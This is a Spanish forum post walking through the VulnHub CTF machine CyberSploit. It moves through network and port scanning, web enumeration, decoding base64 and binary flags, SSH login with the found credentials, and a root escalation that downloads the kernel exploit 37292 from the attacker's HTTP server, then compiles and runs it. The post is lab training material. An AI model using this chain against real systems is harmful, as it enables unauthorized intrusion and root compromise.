Inicio
Buscar
Ingresar
Registrarse
Starfield: el juego que revolucionará el espacio y la tecnología
Hack x Crack - Comunidad de Seguridad informática
»
Seguridad Informatica
»
Wargames
»
Retos no oficiales
»
CTF - CyberSploit [RESUELTO]
Imprimir
Páginas: [
1
]
Ir Abajo
Autor
Tema: CTF - CyberSploit [RESUELTO] (Leído 5709 veces)
R3LI4NT
{ L4 } Geek
Mensajes: 386
El poder del usuario radica en su ANONIMATO.
CTF - CyberSploit [RESUELTO]
«
en:
Junio 19, 2022, 01:32:59 am »
Nombre de la máquina: CyberSploit
O.S: Linux (Ubuntu)
Nivel: Fácil
Reto compartido en mi perfil de Github:
https://github.com/R3LI4NT/ctf-retos
Descargar desde vulnhub:
https://www.vulnhub.com/entry/cybersploit-1,506/
PASO 1):
Identificar la IP de la máquina host con NetDiscover.
Código: Text
netdiscover -i wlan0 -r 192.168.1/24
IP host: 192.168.1.5
PASO 2):
Escanear todos los puertos que estén abiertos con Nmap.
Código: Text
nmap -p- --open -sC -n -vvv 192.168.1.5
Puertos abiertos: [22,80]
PASO 3):
Detección de servicios y sistema operativo.
Código: Text
nmap -p 22,80 -A 192.168.1.5
Servidor corriendo: HTTP Apache
PASO 4):
Enumerar archivos web con Dirb.
Código: Text
dirb http://192.168.1.5 -w /usr/share/dirb/wordlists/common.txt
Archivo:
robots.txt
Mostrar contenido del archivo con Curl:
Código: Text
curl http://192.168.1.5/robots.txt
Mensaje ofuscado a base64: R29vZCBXb3JrICEKRmxhZzE6IGN5YmVyc3Bsb2l0e3lvdXR1YmUuY29tL2MvY3liZXJzcGxvaXR9
Decodificar mensaje con Bash:
Código: Text
echo 'R29vZCBXb3JrICEKRmxhZzE6IGN5YmVyc3Bsb2l0e3lvdXR1YmUuY29tL2MvY3liZXJzcGxvaXR9' | base64 --decode
PASO 5):
Conectarse al servidor SSH.
CREDENCIALES SSH
Usuario:
itsskv
Contraseña (
FLAG_1
):
cybersploit{youtube.com/c/cybersploit}
Código: Text
ssh
[email protected]
Capturar la segunda flag:
Código: Text
cat /home/itsskv/flag2.txt
Flag ofuscada a código binario:
Código: Text
01100111 01101111 01101111 01100100 00100000 01110111 01101111 01110010 01101011 00100000 00100001 00001010 01100110 01101100 01100001 01100111 00110010 00111010 00100000 01100011 01111001 01100010 01100101 01110010 01110011 01110000 01101100 01101111 01101001 01110100 01111011 01101000 01110100 01110100 01110000 01110011 00111010 01110100 00101110 01101101 01100101 00101111 01100011 01111001 01100010 01100101 01110010 01110011 01110000 01101100 01101111 01101001 01110100 00110001 01111101
PASO 6):
Decodificar binario.
ONLINE:
https://www.online-toolz.com/langs/es/tool-es-text-binary-convertor.html
FLAG_2
: cybersploit{https:t.me/cybersploit1}
PASO 7):
Escalar privilegios: buscar exploit con Searchsploit.
Versión del kernel:
3.13.0-32
Código: Text
searchsploit 3.13.0
Descargar exploit:
Código: Text
searchsploit -m 37292
Abrir un servidor local en el puerto 80 con Python3:
Código: Text
python3 -m http.server 80
Descargar exploit en el directorio
/tmp
; compilar y dar permisos de escritrura, lectura y ejecucción:
Código: Text
cd /tmp
wget http://192.168.1.9/37292.c
gcc 37292.c -o kernel
chmod 777 kernel
Por último, explotar el kernel
./kernel
y capturar la key (flag) del fichero
finalflag.txt
dentro del directorio
/root
:
Código: Text
./kernel
cd /root
cat finalflag.txt
FLAG_3
: cybersploit{Z3X21CW42C4 many many congratulations !}
#R3LI4NT
En línea
No contesto dudas por MP, si las tienes, las planteas en el foro.
Road To Hacking v3:
https://github.com/R3LI4NT/road-to-hacking
Imprimir
Páginas: [
1
]
Ir Arriba
Hack x Crack - Comunidad de Seguridad informática
»
Seguridad Informatica
»
Wargames
»
Retos no oficiales
»
CTF - CyberSploit [RESUELTO]
Va un mudo y le dice a un sordo: Hack x Crack usa cookies. Pues eso...
OK
Learn more